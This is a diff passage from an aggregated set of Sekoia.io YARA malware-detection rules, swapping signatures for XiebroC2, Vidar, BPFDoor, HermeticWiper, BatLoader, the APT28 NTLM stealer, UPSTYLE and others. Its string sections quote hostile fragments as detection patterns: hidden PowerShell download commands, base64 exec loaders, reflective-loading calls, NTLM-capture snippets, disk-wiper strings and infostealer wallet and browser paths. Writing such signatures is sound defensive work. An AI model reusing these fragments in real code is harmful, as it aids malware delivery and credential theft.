-		$ = "[-] Get module dir failed!"
-		$ = "[-] Dir error!"
-		$ = "Auto Get Proxy %S"
-		$ = "Dropbox-API-Arg"
+		$ = "<assemblyIdentity type=\"win32\" name=\"dropboxflop\""
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Tool_Xiebroc2_Strings
+rule SEKOIA_Apt_Kimsuky_Sharptongue_Vbslauncher_Strings : FILE
 {
 	meta:
-		description = "Detects XiebroC2 based on strings"
+		description = "Detects VBS Launchers used by SharpTongue"
 		author = "Sekoia.io"
-		id = "8451878e-5371-440b-b8ac-f9e6f7643d3c"
-		date = "2024-09-11"
+		id = "82bd648c-2961-4945-950e-8fb1e4650338"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_xiebroc2_strings.yar#L1-L40"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharptongue_vbslauncher_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "84e665bcbf963a2cf67d879aa3422d79"
-		hash = "3558c376420724694ba244a2e2acd20c"
-		hash = "e29fb9cd825db51a7a2e519f188e61ba"
-		hash = "a3b31739ad5eed51277c8478a83160a3"
-		hash = "d6e2499ea7fe8f047da1a95dae16d2c3"
-		hash = "1616818b65bf49d985bb1816461a4a75"
-		hash = "2e72d3ef2492088a4623d77d5e419ab8"
-		hash = "351770f860507d652ec3644ed1988f7f"
-		hash = "58fa6ad96028753ba8b0b0ed8fa6dccb"
-		hash = "607b541525b27eeefbef1455397bff35"
-		hash = "c2a242612468814e2e951e4db3762059"
-		hash = "431e275f4e43ec4ef7c2cc8ba126e9d3"
-		hash = "ace54bd32c226a7b9a6d4d53791e4021"
-		hash = "f22c21ed7bba1ddfc42ffdc66da3a4dd"
-		hash = "9a5ff9e07ed04cb0e71102cf1aae380c"
-		hash = "d20e01a1af3f40a7a9646d7e7df1b42e"
-		hash = "5544b621c9772cd32c4db77a0e59515a"
-		logic_hash = "f3be31e0f1ad8e8bce132d861de5068340653547d786378f9b8045382f40939f"
+		logic_hash = "9e1383a71b4ab5ca1de5016061f0e9c83e6f3e1a41eef25dae15cd1aab8b581f"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RemarkClientColor"
-		$s2 = "HandlePacket"
-		$s3 = "-hide"
-		$s4 = "Failed to send data:"
-		$s5 = "Pac_ket"
-		$s6 = "WANip"
-		$s7 = "%s %s && Kernel: %s"
-		$g1 = "go.buildid"
-		$g2 = "dep    golang.org"
+		$ = "powershell" ascii wide
+		$ = "On Error Resume Next" ascii wide
+		$ = "oShell.run(tmp0,0" ascii wide
 
 	condition:
-		3 of ( $s* ) and any of ( $g* )
+		all of them and filesize < 10KB
 }
-rule SEKOIA_Backdoor_Xploitspy_Strings : FILE
+rule SEKOIA_Tool_Win_Snap2Html : FILE
 {
 	meta:
-		description = "Detects XploitSPY DEX file"
+		description = "Finds Snap2HTML samples based on specific strings. Legitimate tool used by ransomware affiliates to perform discovery"
 		author = "Sekoia.io"
-		id = "0aa86c2e-dba6-4ef4-a47e-f1b43e04f1f3"
-		date = "2022-08-24"
+		id = "9865daac-f23b-417e-813e-cbed03f45161"
+		date = "2024-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_xploitspy_strings.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_snap2html.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "eabb1dbeaa8aefc33beb7fb158bbd8ad2c5b848d34c99473704da36a6dc461aa"
+		logic_hash = "8805a80193ba1323dffd68456833f27cc93f2182660a5047dbe69e8ed65ac184"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242580,87 +242353,89 @@ rule SEKOIA_Backdoor_Xploitspy_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 04 30 78 43 42 00 }
-		$ = { 04 30 78 43 4C 00 }
-		$ = { 04 30 78 43 4F 00 }
-		$ = { 04 30 78 46 49 00 }
-		$ = { 04 30 78 47 50 00 }
-		$ = { 04 30 78 49 4E 00 }
-		$ = { 04 30 78 4C 4F 00 }
-		$ = { 04 30 78 4D 49 00 }
-		$ = { 04 30 78 4E 4F 00 }
-		$ = { 04 30 78 50 4D 00 }
-		$ = { 04 30 78 53 4D 00 }
-		$ = { 04 30 78 57 49 00 }
+		$str01 = "Snap2HTML.exe" fullword wide ascii
+		$str02 = "Snap2HTML.Properties" ascii
+		$str03 = "set_txtRoot" ascii
+		$str04 = "set_chkHidden" ascii
+		$str05 = "set_chkSystem" ascii
+		$str06 = "set_chkLinkFiles" ascii
+		$str07 = "set_txtLinkRoot" ascii
+		$str08 = "set_chkOpenOutput" ascii
+		$str09 = "set_txtTitle" ascii
+		$str10 = "get_CancellationPending" ascii
+		$str11 = "set_RootFolder" ascii
+		$str12 = "add_SettingsLoaded" ascii
 
 	condition:
-		uint32be( 0 ) == 0x6465780A and filesize < 1MB and 10 of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_1 : FILE
+
+rule SEKOIA_Wiper_Hermeticwiper_Variants
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Matches HermeticWiper and possible variants"
 		author = "Sekoia.io"
-		id = "0b328771-f674-4606-bb30-d20d07c67832"
-		date = "2023-05-15"
+		id = "102ecf15-167e-49e4-932c-6334e3cdcc69"
+		date = "2022-02-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_generic_1.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_hermeticwiper_variants.yar#L3-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "513226d050945af1a8bbc51f9a48936c815bfc6cd43b0766e34ac000d3c90625"
+		logic_hash = "d0c358517b0a6334d430d3bd75d6c58243ce84e0f90afe48a5069a1e1954119c"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\CommonCommand\\Clean\\"
-		$ = "\\CommonCommand\\Overall\\"
-		$ = "\\CommonCommand\\Other\\"
-		$ = "\\CommonCommand\\Other\\*"
+		$ = "SeLoadDriverPrivilege" wide
+		$ = "\\\\.\\PhysicalDrive" wide
+		$ = "::$INDEX_ALLOCATION" wide
+		$ = "CrashDumpEnabled" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		2 of them and pe.characteristics and pe.number_of_signatures == 1 and pe.number_of_resources > 2 and for 2 i in ( 0 .. pe.number_of_resources - 1 ) : ( uint32be( pe.resources [ i ] . offset + 15 ) == 0x4D5A9000 and uint16be( pe.resources [ i ] . offset ) == 0x535A )
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Obfuscated : FILE
+rule SEKOIA_Rat_Lin_Gobrat_2023 : FILE
 {
 	meta:
-		description = "Detects obfuscated version of PowerShower"
+		description = "This rule detect samples that are downloaded on the GobRAT C2 URL path /a, /b and /c."
 		author = "Sekoia.io"
-		id = "f76ab9d8-7753-4a17-aedd-fc9c3b8cd322"
-		date = "2022-11-29"
+		id = "ca36a586-f87f-445f-95dc-52d447c1d2a2"
+		date = "2023-06-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_obfuscated.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_lin_gobrat_2023.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fdb1edb3982eb5356cdf5fd1fa9fcc41d5048848b2a05589e87836ac0b05ec7a"
+		logic_hash = "b9831cefded9e48ef169aa56c18628a9871760ae613f75b232019b4798944e16"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "36cb17d9d118bd9692106c8aafab2462aacf1cdad3a6afb0e4f1de898a7db0e1"
+		hash2 = "28a714f7cec4445dbd507b85016c8e96ed5e378bcabe2e422c499975122b3f03"
+		hash3 = "1e80a084ab89da2375bc3cc2f5a37975edff709ef29a3fa2b4df4ccb6d5afe10"
 
 	strings:
-		$s1 = "{0}{1}{2}{3}{4}{5}{6}{7}{8}" ascii wide
-		$s2 = "{000}{001}{002}{003}{004}{005}{006}{007}{008}" ascii wide
-		$s3 = "::Unicode.GetString([System.Convert]::FromBase64String(" ascii wide
+		$s1 = "Z:/Go/awesomeProject3/main.go" wide ascii
 
 	condition:
-		($s1 in ( 0 .. 100 ) or $s2 in ( 0 .. 100 ) ) and $s3 in ( filesize -200 .. filesize )
+		uint32( 0 ) == 0x464c457f and filesize < 4000KB and $s1
 }
-rule SEKOIA_Builder_Win_Royalroad_Rtf : FILE
+rule SEKOIA_Backdoor_Lin_Bpfdoor : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
+		description = "Detect the BPFDoor backdoor used by the Chinese TA Red Menshen"
 		author = "Sekoia.io"
-		id = "065e798b-eadd-4aac-a444-de61b75f0273"
-		date = "2022-06-23"
+		id = "1776ff6f-6fbb-4a81-bcad-c43b5117c67c"
+		date = "2022-05-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/builder_win_royalroad_rtf.yar#L1-L15"
+		reference = "https://github.com/Neo23x0/signature-base/blob/master/yara/mal_lnx_implant_may22.yar"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_lin_bpfdoor.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "831962105248e33422344d1431b90f2b567439b54252668f9294ea388f405b41"
+		logic_hash = "c917bd12731d761645adea72bc68c50927a0c2b0c31b2109f7065a992d338329"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242668,88 +242443,82 @@ rule SEKOIA_Builder_Win_Royalroad_Rtf : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "{\\object\\objocx{\\objdata"
-		$ = "ods0000"
+		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
+		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
+		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
+		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		uint32( 0 ) == 0x464c457f and filesize > 10KB and filesize < 50KB and ( all of ( $op* ) )
 }
-rule SEKOIA_Infostealer_Win_Vidar_Str_Jul22 : FILE
+rule SEKOIA_Loader_Amadey_Standalone_May23 : FILE
 {
 	meta:
-		description = "Detect the Vidar infostealer based on specific strings"
+		description = "Finds standalone samples of Amadey based on characteristic strings"
 		author = "Sekoia.io"
-		id = "1dc18694-aaac-41e6-979a-c06d5d62f5ea"
-		date = "2022-07-26"
+		id = "5013586c-5ac3-4c1a-a82e-edce4889eedc"
+		date = "2023-05-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_vidar_str_jul22.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_amadey_standalone_may23.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "394d148155d46753df188a252678c5ce9d0aa321da8907e74b844d5aa8494a47"
+		logic_hash = "40d2d7a52066ca4e1a65c82ebfa882a77616a1c68f1d315946ab14467787d468"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2022-08-23"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "vcruntime140.dll" ascii
-		$str02 = "\\screenshot.jpg" ascii
-		$str03 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor" ascii
-		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" ascii
-		$str05 = "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb" ascii
-		$str06 = "\\CC\\%s_%s.txt" ascii
-		$str07 = "\\Autofill\\%s_%s.txt" ascii
-		$str08 = "\\History\\%s_%s.txt" ascii
-		$str09 = "\\Downloads\\%s_%s.txt" ascii
-		$str10 = "Content-Disposition: form-data; name=" ascii
-		$str11 = "Exodus\\exodus.wallet" ascii
-		$str12 = "*%DRIVE_REMOVABLE%*" ascii
-		$opc = {55 8b ec 51 56 8b 75 ?? 33 c0 c7 46 14 ?? ?? ?? ?? 89 46 ?? 68 ?? ?? ?? ?? 8b ce 89 45 ?? 88 06 e8 1f b6 ff ff 8b c6 5e c9 c2 ?? ??}
+		$str01 = "\\Amadey\\Release\\Amadey.pdb" ascii
+		$hex01 = { 6E 74 64 6C 6C 2E 64 6C  6C 00 00 00 72 75 6E 61 73 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 7 of them or $opc )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_2 : FILE
+rule SEKOIA_Clipper_Win_Atlas_Strings
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Detects Atlas Clipper"
 		author = "Sekoia.io"
-		id = "c6a16ecc-e00a-4756-b603-f6c85e4f4220"
-		date = "2023-05-15"
+		id = "f08c6af6-c325-4f7d-8686-575b25550d6a"
+		date = "2023-07-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_generic_2.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/clipper_win_atlas_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d3916ab749ae5b6e0a8abdc9641de13e0328809a6e20c6ce04ada5dbfb742689"
+		logic_hash = "c8ad062b69dfe996a488ee9c79f0e7e0016f57f5b54fc39aeb4e207d2a42aa75"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\CommonCommand\\" ascii wide
-		$ = "\\\\.\\pipe\\PipeMd" ascii wide fullword
-		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
-		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
+		$s1 = "C:/Users/box/Desktop/ATLAS/ATLAS/main.go" ascii
+		$s2 = "ATLAS Clipper" ascii
+		$s3 = "Victim: %s" ascii
+		$s4 = "Attacker: %s" ascii
+		$s5 = "Install Path: %s" ascii
+		$s6 = "HWID: %s" ascii
+		$s7 = "Install Date: %s" ascii
+		$s8 = "https://t.me/atlasclipper_channel" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 2 of them
+		all of them
 }
-rule SEKOIA_Crime_Sload_Vbs_Downloader_Strings_1 : FILE
+rule SEKOIA_Hacktool_Ligolo_Strings : FILE
 {
 	meta:
-		description = "Detects an sLoad downloader based on strings"
+		description = "Detects ligolo based on strings"
 		author = "Sekoia.io"
-		id = "77ff0d21-9249-43b2-9a6d-87988a2dec3b"
-		date = "2022-08-02"
+		id = "5013256b-eda3-417e-ac72-959055b01c7e"
+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_vbs_downloader_strings_1.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ligolo_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "06e4fcb6c48078c6c44d779820fc901b0f335b9495097ed28206826a959d0712"
+		logic_hash = "12609bed61ef4d86737bc652a75c74f01e4a251466129ff56da0d7e002566d50"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242757,25 +242526,27 @@ rule SEKOIA_Crime_Sload_Vbs_Downloader_Strings_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "On Error Resume Next"
-		$ = {0A [4] 3D 41 72 72 61 79}
-		$ = { 2E 50 61 74 74 65 72 6E 20 3D 20 22 28 [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C }
+		$ = "Restarting Ligolo..."
+		$ = "Ligolo starts a socks5 proxy server"
+		$ = "main.startSocksProxy"
+		$ = "main.handleRelay"
+		$ = "main.StartLigolo"
 
 	condition:
-		all of them and filesize < 20KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
 }
-rule SEKOIA_Tool_Iodine_Strings : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Vbs_Launcher_Strings : FILE
 {
 	meta:
-		description = "Detects iodine based on strings"
+		description = "Detects XDealer VBS Launcher"
 		author = "Sekoia.io"
-		id = "029766cc-80fb-423d-adc5-8867c438c5d3"
-		date = "2024-02-02"
+		id = "ebfc8a33-70dc-44d5-bc4a-07afc56f8254"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_iodine_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_vbs_launcher_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "049b5af42d204061bd7e0c0294bb0abea492647dce8ec63fa3f296d1a19cb246"
+		logic_hash = "e206189fd21ed7b3bf48a51d955df9055b7f7aa502b7fac52b274cc414adea0d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242783,80 +242554,91 @@ rule SEKOIA_Tool_Iodine_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Sending DNS queries for %s to %s"
-		$ = "No tun devices found, trying utun"
-		$ = "iodine IP over DNS tunneling client"
-		$ = "topdomain is the FQDN that is delegated to the tunnel endpoint."
+		$s1 = "Dim objws"
+		$s2 = "Set objws="
+		$s3 = "objws.Run \"\"\"C:\\ProgramData\\"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and 3 of them
+		$s1 at 0 and all of them and filesize < 200
 }
-rule SEKOIA_Koi_Koiloader : FILE
+rule SEKOIA_Koiloader_Powershell_Reflective_Loading : FILE
 {
 	meta:
-		description = "Detects Koi Loader"
+		description = "Powershell script loading service.exe (related to Koi Loader)"
 		author = "Sekoia.io"
-		id = "b8289d78-42de-4919-b2c5-3c926ddd8043"
+		id = "9bbe4cea-3e64-4377-bf93-def9fb629734"
 		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koi_koiloader.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koiloader_powershell_reflective_loading.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7b4f12b0dec3927a46db1c8b2163e54a0a515d2b7360ba94647097fecf3d4653"
+		logic_hash = "27deec01027a73129c6c8057eff1b48190c89ac18dcd7c390fc177d82a897290"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s2 = "%d|%s|%.16s|" ascii wide
-		$s3 = "Release" ascii wide
-		$s4 = "%s|%d.%d (%d)|%S|%S|%S" ascii wide
-		$s5 = "InitiateSystemShutdownExW" ascii wide
+	strings:
+		$s1 = "[Byte[]]$image" ascii fullword
+		$s2 = "function GDT"
+		$s3 = "function GPA"
+		$s4 = "GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])"
+		$s5 = "$marshal::GetDelegateForFunctionPointer($CTAddr, $CTDeleg)"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
+		$s1 at 0 and 4 of them
 }
-rule SEKOIA_Water_Sigbin_Group
+rule SEKOIA_Loader_Win_Batloader_Scripts : FILE
 {
 	meta:
-		description = "Detects IOCs related to the 8220 Mining group."
+		description = "Finds BatLoader samples based on the specific download URL"
 		author = "Sekoia.io"
-		id = "c49728e8-db7e-4d83-97d2-7d56b51f8a52"
-		date = "2024-06-11"
+		id = "31a04ad3-74f8-4aa5-b3fc-df792bdc71b5"
+		date = "2022-11-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/water_sigbin_group.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_batloader_scripts.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dd51945bf79e37b50d377eda3641eb32438dcb5a1c55fb4a9b66a5b5a8b5ed0d"
+		logic_hash = "aab6c7780bbc7bed8994b4e70129107bb7b719642fae92b1d3f9146eb11efabc"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Z12A3" ascii fullword
-		$s2 = "FromBase64String" ascii fullword
-		$s3 = "Start-Process" ascii fullword
-		$s4 = "WriteAllBytes" ascii fullword
+		$url = /https?:\/\/[^\s]{15,35}\/index\/[^\s]{1,40}servername=msi/ ascii wide
+		$str00 = "Invoke-WebRequest" ascii wide
+		$str01 = "PSScriptRoot" ascii wide
+		$str02 = "Add-MpPreference" ascii wide
+		$str03 = "Install-GnuPG" ascii wide
+		$str04 = "wmic computersystem get domain" ascii wide
+		$str05 = "ArpInfo" ascii wide
+		$str06 = "$script:List_ProccesCheck" ascii wide
+		$str07 = "Get-Process -Name" ascii wide
+		$str08 = "f001_SetProcessList" ascii wide
+		$str09 = "var WshShell" ascii wide
+		$str10 = "WScript.Sleep" ascii wide
+		$str11 = "WshShell.Run" ascii wide
+		$str12 = "powershell Invoke-WebRequest" ascii wide
+		$str13 = "-nop -w hidden " ascii wide
 
 	condition:
-		all of them
+		$url and 2 of ( $str* ) and filesize < 50KB
 }
-rule SEKOIA_Tool_Dogtunnel_Strings : FILE
+rule SEKOIA_Apt_Apt28_Powershell_Ntlm_Stealer : FILE
 {
 	meta:
-		description = "Detects Dog Tunnel based on strings"
+		description = "Detects the NTLM Stealer used by APT28 against UA energy sector"
 		author = "Sekoia.io"
-		id = "00705613-6367-454f-b3f2-1e2b0a52459c"
-		date = "2024-03-14"
+		id = "3fb5c472-6b1c-490e-b38f-4d4f1c472f43"
+		date = "2023-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_dogtunnel_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_powershell_ntlm_stealer.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "04e7141e67ba841b0955b9e36c43be1f5b22e635b96d58b8b1b52fd507ddd929"
+		logic_hash = "29d039bf7d7018ebbae187ae0f057161c3f9256076324f06167872adc0accfa7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242864,27 +242646,27 @@ rule SEKOIA_Tool_Dogtunnel_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "pipe.(*UDPMakeSession).doAndWait"
-		$ = "ikcp.ikcp_parse_fastack"
-		$ = "pipe.ListenWithSetting"
-		$ = "pipe.DialTimeoutWithSetting"
-		$ = "common.ReadUDP"
+		$ = "'NTLM ' = [Convert]::ToBase64String"
+		$ = ".Prefixes.Add('http://localhost:8080/')"
+		$ = ".AddHeader('WWW-Authenticate', 'NTLM')"
+		$ = "GetValues('Authorization');"
+		$ = "[0] -split '\\s+';"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 10MB
+		3 of them and filesize < 4000
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Devtoolmodule_Strings : FILE
+rule SEKOIA_Apt_Uta0218_Upstyle_Backdoor_Strings : FILE
 {
 	meta:
-		description = "Detects the DevTool module used by SharpExt"
+		description = "Detects UPSTYLE backdoor"
 		author = "Sekoia.io"
-		id = "6f589a9c-344a-4ddc-929e-f123a2c3c187"
-		date = "2022-07-29"
+		id = "098fbad7-efaf-4198-83de-208c2ae16f89"
+		date = "2024-04-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_devtoolmodule_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uta0218_upstyle_backdoor_strings.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "61007801d28636c6d88b14225f34910d03e82337520257637a5017d58600b2bc"
+		logic_hash = "bcba657b0b302f4b46f09bc4b815a581d22208b5d9f99e1233878f775241f92e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242892,128 +242674,181 @@ rule SEKOIA_Apt_Kimsuky_Sharpext_Devtoolmodule_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "packetProc = function" ascii fullword
-		$ = "var url = request.request.url" ascii fullword
-		$ = "https://mail" ascii fullword
+		$s1_1 = "f.write(b'''import base64;exec(base64.b64decode(b" ascii
+		$s1_2 = "atime=os.path.getatime(" ascii
+		$s2_1 = "exec(base64.b64decode(functioncode))" ascii base64
+		$s2_2 = "os.path.exists(systempth):" ascii base64
+		$s2_3 = ".read().replace(b\"\\x00\",b\" \")" ascii base64
+		$s3_1 = "if WRITE_FLAG:" ascii base64
+		$s3_2 = "re.search(SHELL_PATTERN" ascii base64
+		$s3_3 = "import threading,time,os,re,base64" ascii base64
 
 	condition:
-		all of them and filesize < 50KB
+		filesize < 1500 and ( 2 of ( $s1_* ) or 2 of ( $s2_* ) or 2 of ( $s3_* ) )
 }
-
-rule SEKOIA_Loader_Win_Jennlog
